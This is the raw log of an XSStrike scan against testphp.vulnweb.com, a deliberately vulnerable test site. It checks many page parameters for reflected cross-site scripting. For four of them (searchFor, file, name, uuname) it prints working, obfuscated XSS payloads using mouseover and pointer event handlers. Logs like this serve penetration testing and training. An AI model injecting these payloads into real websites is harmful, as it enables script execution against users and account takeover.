xsstrike logs


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/artists.php with param: artist=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: artist [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/search.php with param: test=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: test [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/search.php with param: searchFor=mrt\&goButton=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: searchFor [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072
 [0m
[97m[~][0m Progress: 2/3072
 [0m
[97m[~][0m Progress: 3/3072
 [0m
[97m[~][0m Progress: 4/3072
 [0m
[97m[~][0m Progress: 5/3072
 [0m
[97m[~][0m Progress: 6/3072
 [0m
[97m[~][0m Progress: 7/3072
 [0m
[97m[~][0m Progress: 8/3072
 [0m
[97m[~][0m Progress: 9/3072
 [0m
[97m[~][0m Progress: 10/3072
 [0m
[97m[~][0m Progress: 11/3072
 [0m
[97m[~][0m Progress: 12/3072
 [0m
[97m[~][0m Progress: 13/3072
 [0m
[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <d3V%0donmOuseoVEr%0a=%0aa=prompt,a()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 92 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/listproducts.php with param: cat=mrt\&artist=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: cat [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 1536 [0m
[93m[!][0m Testing parameter: artist [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/showimage.php with param: file=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: file [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072
 [0m
[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <D3v%0doNMOuSEoVer%0d=%0dconfirm()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 100 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/userinfo.php with param: uname=mrt\&None=mrt\&pass=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: uname [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: None [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: pass [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/product.php with param: pic=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: pic [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/cart.php with param: addcart=mrt\&None=mrt\&price=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: addcart [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: None [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: price [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/guestbook.php with param: name=mrt\&submit=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: name [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072
 [0m
[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <d3v%09onpoIntERentER+=+(confirm)()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 90 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/ with param: pp=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: pp [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com//secured/newuser.php with param: uuname=mrt\&upass=mrt\&upass2=mrt\&urname=mrt\&ucc=mrt\&uemail=mrt\&uphone=mrt\&signup=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: uuname [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072
 [0m
[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <hTmL/+/oNpoiNTErENTER%09=%09confirm()%0dx// [0m
[93m[!][0m Efficiency: 100 [0m
[93m[!][0m Confidence: 10 [0m
